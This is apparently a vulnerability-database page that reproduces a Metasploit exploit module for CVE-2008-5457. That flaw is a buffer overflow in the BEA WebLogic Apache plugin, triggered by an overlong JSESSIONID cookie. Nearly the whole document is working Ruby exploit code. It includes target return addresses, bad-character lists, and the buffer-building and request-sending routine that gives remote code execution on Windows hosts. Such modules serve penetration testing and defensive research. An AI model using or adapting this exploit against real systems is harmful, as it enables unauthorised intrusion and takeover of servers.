BEA WebLogic JSESSIONID Cookie Value Overflow

2009-03-27T19:03:39
ID MSF:EXPLOIT/WINDOWS/HTTP/BEA_WEBLOGIC_JSESSIONID
Type metasploit
Reporter Rapid7
Modified 2017-09-14T02:03:34

Description

This module exploits a buffer overflow in BEA's WebLogic plugin. The vulnerable code is only accessible when clustering is configured. A request containing a long JSESSION cookie value can lead to arbitrary code execution.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'BEA WebLogic JSESSIONID Cookie Value Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in BEA's WebLogic plugin. The vulnerable
        code is only accessible when clustering is configured. A request containing a
        long JSESSION cookie value can lead to arbitrary code execution.
      },
      'Author'         => 'pusscat',
      'References'     =>
        [
          [ 'CVE', '2008-5457' ],
          [ 'OSVDB', '51311' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
        },
      'Privileged'     => true,
      'Platform'       => 'win',
      'Payload'        =>
        {
          'Space'    => 800,
          'BadChars' => "\x00\x0d\x0a\x20\x3B\x3D\x2C",
          'StackAdjustment' => -3500,
        },
      'Targets'        =>
        [
          [  'Windows Apache 2.2 - WebLogic module version 1.0.1136334',
            {
              'Ret' => 0x1006c9b5,    # jmp esp
            }
          ],
          [  'Windows Apache 2.2 - WebLogic module version 1.0.1150354',
            {
              'Ret' => 0x1006c9be,    # jmp esp
            }
          ],
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Jan 13 2009'))

    register_options(
      [
        Opt::RPORT(80)
      ])
  end

  def exploit
    sploit = Rex::Text.rand_text_alphanumeric(10000, payload_badchars)
    sploit[8181, 4] = [target.ret].pack('V')
    sploit[8185, payload.encoded.length] = payload.encoded

    request =
      "POST /index.jsp HTTP/1.1\r\nHost: localhost\r\nCookie: TAGLINE=IAMMCLOVIN; JSESSIONID=" +
      sploit +
      "\r\n\r\n"

    connect
    sock.put(request);
    handler

    disconnect
  end
end